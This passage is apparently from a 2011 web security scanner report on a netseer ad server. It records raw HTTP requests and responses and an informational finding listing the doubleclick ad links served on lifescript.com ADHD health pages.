http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04673968628048897&cpos=2&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fd%3B240321491%3B0-0%3B3%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd%3Bcontentid%3Dfbca8610%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Btax%3Dadhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276277166 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=109374225633552
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fed4c7f34cb5610,1311276202616,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276202617,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvb3V0X29mX2NvbnRyb2xfaXRfY291bGRfYmVfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fe36fdfba28bf14,1311276272392,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276272394,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvZG9jdG9yLXJlY29tbWVuZGVkX3RpcHNfZm9yX3dvbWVuX3dpdGhfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:24:32 GMT
Content-Length: 12397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
<td id="cpts_c_p1_r1_c1">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.18060718476772308&cpos=1&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p1_r1_c1">
                                       ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p2_r1_c2">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04673968628048897&cpos=2&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p2_r1_c2">
                                       Hyperactivity Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p3_r1_c3">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14492054283618927&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p3_r1_c3">
                                       ADHD Treatment
                                       </a>
...[SNIP]...
<td id="cpts_c_p4_r2_c4">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11105802655220032&cpos=4&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p4_r2_c4">
                                       ADHD in Adults
                                       </a>
...[SNIP]...
<td id="cpts_c_p5_r2_c5">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Child+with+ADHD&chash=3007873813482410363&cscr=0.03458286076784134&cpos=5&creg=0&cnads=20&cpc=3.740000009536743&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p5_r2_c5">
                                       Child with ADHD
                                       </a>
...[SNIP]...
<td id="cpts_c_p6_r2_c6">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADD+and+ADHD+Information&chash=3660505418659665001&cscr=0.07337363809347153&cpos=6&creg=0&cnads=20&cpc=7.940000057220459&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p6_r2_c6">
                                       ADD and ADHD Information
                                       </a>
...[SNIP]...
<td id="cpts_c_p7_r3_c7">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Help&chash=-741781366439515232&cscr=0.03321396932005882&cpos=7&creg=0&cnads=20&cpc=5.079999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p7_r3_c7">
                                       ADHD Help
                                       </a>
...[SNIP]...
<td id="cpts_c_p8_r3_c8">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Anxiety+Attacks&chash=-8189732505136611516&cscr=0.022995220497250557&cpos=8&creg=0&cnads=20&cpc=2.680000066757202&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p8_r3_c8">
                                       Anxiety Attacks
                                       </a>
...[SNIP]...
<td id="cpts_c_p9_r3_c9">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Disorder+Treatment&chash=-757757160123027445&cscr=0.009844579733908176&cpos=9&creg=0&cnads=20&cpc=0.8100000023841858&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p9_r3_c9">
                                       Disorder Treatment
                                       </a>
...[SNIP]...

18.57. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Ft%3B242224827%3B0-0%3B1%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276276618

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADD+and+ADHD+Symptoms&chash=-4953049157564972247&cscr=0.06330152601003647&cpos=7&creg=0&cnads=12&cpc=5.980000019073486&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07162024825811386&cpos=1&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.15707257390022278&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14457887411117554&cpos=6&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11372934281826019&cpos=3&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=About+Anxiety&chash=-2030480214097464183&cscr=0.0022842565085738897&cpos=9&creg=0&cnads=20&cpc=1.1399999856948853&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Anxiety+Disorders+Symptoms&chash=8711261873686427320&cscr=0.08816888183355331&cpos=5&creg=0&cnads=20&cpc=2.2300000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Child+with+ADHD&chash=3007873813482410363&cscr=0.033913664519786835&cpos=8&creg=0&cnads=20&cpc=3.740000009536743&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04665462300181389&cpos=4&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Ft%3B242224827%3B0-0%3B1%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276276618 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=101352252258050
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fed4c7f34cb5610,1311276202616,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276202617,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvb3V0X29mX2NvbnRyb2xfaXRfY291bGRfYmVfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fe05dc1e116b248,1311276271577,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:31 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:31 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276271578,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,6,2"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:31 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:24:30 GMT
Content-Length: 12315

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
<td id="cpts_c_p1_r1_c1">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe05dc1e116b248&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07162024825811386&cpos=1&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p1_r1_c1">
                                       ADHD Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p2_r1_c2">
